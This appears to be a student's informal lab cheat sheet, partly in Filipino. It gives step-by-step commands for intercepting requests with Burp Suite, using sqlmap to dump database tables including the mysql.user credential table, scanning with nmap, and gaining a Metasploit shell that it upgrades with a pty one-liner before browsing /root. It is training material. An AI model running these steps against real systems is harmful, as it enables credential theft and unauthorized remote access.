Burpsuite

1. Open burp and intercept on

2. Open firefox
3. Settings
4. Search Proxy
5. Edit the Proxy into 127.0.0.1 port 8080
6. search http://burpsuite
7. Download the certificate
8. search on settings the certificate
9. import the downloaded certificate
10. Open the link for the vulnerable website
11. Back to burp and copy the file
12. save the file example.req

SQLMAP ADMIN
1. sqlmap -r example.req --dbs (show all the database)
2. yes to all
3. after that magshow yung database
4. sqlmap -r example.req -D seattle --tables (-D nalang because u already know the
database na papasukan mo, specific database)
5. sqlmap -r example.req -D seattle --T tblMembers --columns (-T nalang because u
already know the table na papasukan mo, specific table)
6. sqlmap -r example.req -D seattle --T tblMembers --column --dump
7. enter langs
ALTERNATE PAG BORED KANA
8. cd /tmp/sqlchuhchuchu

SQLMAP ROOT
1. sqlmap -r example.req --dbs (show all the database)
2. sqlmap -r example.req -D mysql --tables
3. sqlmap -r example.req -D mysql -T user --columns
4. sqlmap -r example.req -D mysql -T user --columns --dump
ALTERNATE PAG BORED KANA
5. cd /tmp/sqlchuhchuchu

PRIV ESCALATION WITH METASPLOIT

NMAP
1. nmap -t4 -sV -sC the ip address of the vulnerable
2. go to firefox
3. https://ip address:port number na nakita dun sa nmap
4. pag di vulnerable yung target mag metasploit
5. msfconsole
6. to see the vulnerability of the target type searchsploit targetname or ip
7. go back to msf6 and type search the targetname or ip add
8. use 0 (number)
9. show options
10. set RHOST (ip address of the target)
11. set TARGETURI (url of the target)
12. set LHOST (ip ng kali mo) mag ifconfig ka para malaman mo ip mo
13. show options pag tapos kana lahat or nalagyan mo na lahat
14. run
15. set SSL true
16. run
17. type python3 -c 'import pty; pty.spawn("/bin/bash")' para magka interface ka
like linux
18. cd /home/
19. ls
19. cd root
20. ls